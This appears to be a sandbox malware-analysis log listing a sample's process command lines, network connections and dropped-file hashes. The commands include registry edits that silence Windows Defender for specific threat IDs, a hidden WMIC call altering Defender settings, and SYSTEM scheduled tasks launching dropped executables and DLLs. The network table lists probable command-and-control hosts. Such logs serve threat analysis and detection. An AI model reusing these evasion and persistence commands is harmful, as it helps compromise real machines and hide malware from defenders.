"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 10:36:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe\" aV /UFLjdidQN 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "yfARWRprRqUFWeTGf"

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe aV /UFLjdidQN 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\NnLrHPE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "JHJXtPPPvDXVqpH"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\qEhqRoj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\ugXndCE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\jMqUbEC.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\ksylHPJ.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 02:37:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\frefqIut\zSQGBgO.dll\",#1 /LdidITAI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aNyMQclguOCSCcjxm"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\frefqIut\zSQGBgO.dll",#1 /LdidITAI 385118

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\frefqIut\zSQGBgO.dll",#1 /LdidITAI 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\RwduFv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\wWdIpln.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "JHJXtPPPvDXVqpH"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\gxzrjQZ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\RqxYVia.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\AoFMuFn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\HGutlUL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\Pictures\qks0AMNyD1SeHMccrttR2V2j.exe

"C:\Users\Admin\Pictures\qks0AMNyD1SeHMccrttR2V2j.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Windows\SYSTEM32\msiexec.exe

"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 0B0154092FD65EFBC164C04B9570253F

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 1A5926D48F9403163B87BE5A8F2997E0 E Global\MSI0000

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6CB312218323B7E907C4DD2D1E417090 M Global\MSI0000

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe

"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3a9a855 /state1:0x41c64e6d

C:\Windows\SYSTEM32\MSIEXEC.EXE

MSIEXEC.EXE /i "C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi" /qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP" SETUPEXENAME="ce_7.14.2_windows_x86_64.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Network

Country Destination Domain Proto
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 172.67.181.34:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 172.67.185.32:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 104.21.44.125:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 32.185.67.172.in-addr.arpa udp
US 8.8.8.8:53 34.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 143.191.110.104.in-addr.arpa udp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 104.21.18.233:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 125.44.21.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 104.21.22.160:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 233.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
US 104.21.23.143:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 communicationgenerwo.shop udp
US 104.21.83.19:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 160.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 143.23.21.104.in-addr.arpa udp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
US 8.8.8.8:53 19.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 productivelookewr.shop udp
US 172.67.150.207:443 productivelookewr.shop tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 104.21.89.202:443 tolerateilusidjukl.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 shatterbreathepsw.shop udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
US 8.8.8.8:53 202.89.21.104.in-addr.arpa udp
DE 185.172.128.33:8970 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 172.67.216.69:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 104.21.86.106:443 incredibleextedwj.shop tcp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 106.86.21.104.in-addr.arpa udp
US 8.8.8.8:53 69.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
US 8.8.8.8:53 file-host-host0.com udp
US 104.21.48.243:443 alcojoldwograpciw.shop tcp
RU 109.196.164.182:80 file-host-host0.com tcp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 243.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 182.164.196.109.in-addr.arpa udp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 104.21.33.174:443 demonstationfukewko.shop tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 174.33.21.104.in-addr.arpa udp
US 8.8.8.8:53 parrotflight.com udp
US 172.67.187.204:443 parrotflight.com tcp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 204.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 junglethomas.com udp
US 104.21.92.190:443 junglethomas.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 190.92.21.104.in-addr.arpa udp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 file-drop.cc udp
US 172.67.146.180:443 file-drop.cc tcp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 180.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.4.235:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 realdeepai.org udp
US 188.114.97.2:443 realdeepai.org tcp
US 188.114.97.2:443 realdeepai.org tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 8.8.8.8:53 jonathantwo.com udp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 133.191.110.104.in-addr.arpa udp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
GB 85.192.56.26:80 85.192.56.26 tcp
US 8.8.8.8:53 features.opera-api2.com udp
NL 185.26.182.106:443 features.opera-api2.com tcp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.24:443 download.opera.com tcp
US 8.8.8.8:53 106.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 26.56.192.85.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
FR 52.143.157.84:80 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 2.16.27.201:443 download3.operacdn.com tcp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 201.27.16.2.in-addr.arpa udp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp
US 8.8.8.8:53 108.254.92.91.in-addr.arpa udp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:1111 saveclinetsforme68465454711991.publicvm.com tcp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 api.check-data.xyz udp
US 35.82.94.151:80 api.check-data.xyz tcp
US 8.8.8.8:53 151.94.82.35.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 239.249.30.184.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp

Files

memory/4656-0-0x00000000008C0000-0x0000000000D86000-memory.dmp

memory/4656-1-0x00000000779B4000-0x00000000779B5000-memory.dmp

memory/4656-4-0x00000000051A0000-0x00000000051A1000-memory.dmp

memory/4656-9-0x00000000051D0000-0x00000000051D1000-memory.dmp

memory/4656-8-0x00000000051C0000-0x00000000051C1000-memory.dmp

memory/4656-7-0x0000000005190000-0x0000000005191000-memory.dmp

memory/4656-6-0x0000000005180000-0x0000000005181000-memory.dmp

memory/4656-5-0x00000000051E0000-0x00000000051E1000-memory.dmp

memory/4656-3-0x00000000051B0000-0x00000000051B1000-memory.dmp

memory/4656-2-0x00000000008C0000-0x0000000000D86000-memory.dmp

memory/4656-10-0x0000000005200000-0x0000000005201000-memory.dmp

memory/4656-12-0x00000000051F0000-0x00000000051F1000-memory.dmp

memory/4656-16-0x00000000008C0000-0x0000000000D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

MD5 1bd74ec32d03840b8c1771d9ad21581b
SHA1 7e98aa9a833f87fe6b47bccae7cd9b9f9dce5ac4
SHA256 fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814
SHA512 da5473d44a865774c2af86e61e5f8d4806bd151a709339290e79a623a2d43f3c85d45ae6b982d3b0d31dd4894919fe75ef98482b8240a1bebcc60709388a6b16

memory/60-19-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/60-24-0x0000000005200000-0x0000000005201000-memory.dmp

memory/60-27-0x00000000051F0000-0x00000000051F1000-memory.dmp

memory/60-26-0x00000000051B0000-0x00000000051B1000-memory.dmp

memory/60-25-0x00000000051A0000-0x00000000051A1000-memory.dmp

memory/60-23-0x00000000051C0000-0x00000000051C1000-memory.dmp

memory/60-22-0x00000000051E0000-0x00000000051E1000-memory.dmp

memory/60-21-0x00000000051D0000-0x00000000051D1000-memory.dmp

memory/60-20-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/60-29-0x0000000005210000-0x0000000005211000-memory.dmp

memory/60-28-0x0000000005220000-0x0000000005221000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

MD5 1c7d0f34bb1d85b5d2c01367cc8f62ef
SHA1 33aedadb5361f1646cffd68791d72ba5f1424114
SHA256 e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA512 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

memory/4460-43-0x0000000000AE0000-0x0000000000B32000-memory.dmp

memory/4504-46-0x0000000000400000-0x000000000044C000-memory.dmp

memory/4504-48-0x0000000000400000-0x000000000044C000-memory.dmp

memory/60-49-0x0000000000D80000-0x0000000001246000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

memory/236-66-0x000001E61F9A0000-0x000001E61F9C2000-memory.dmp

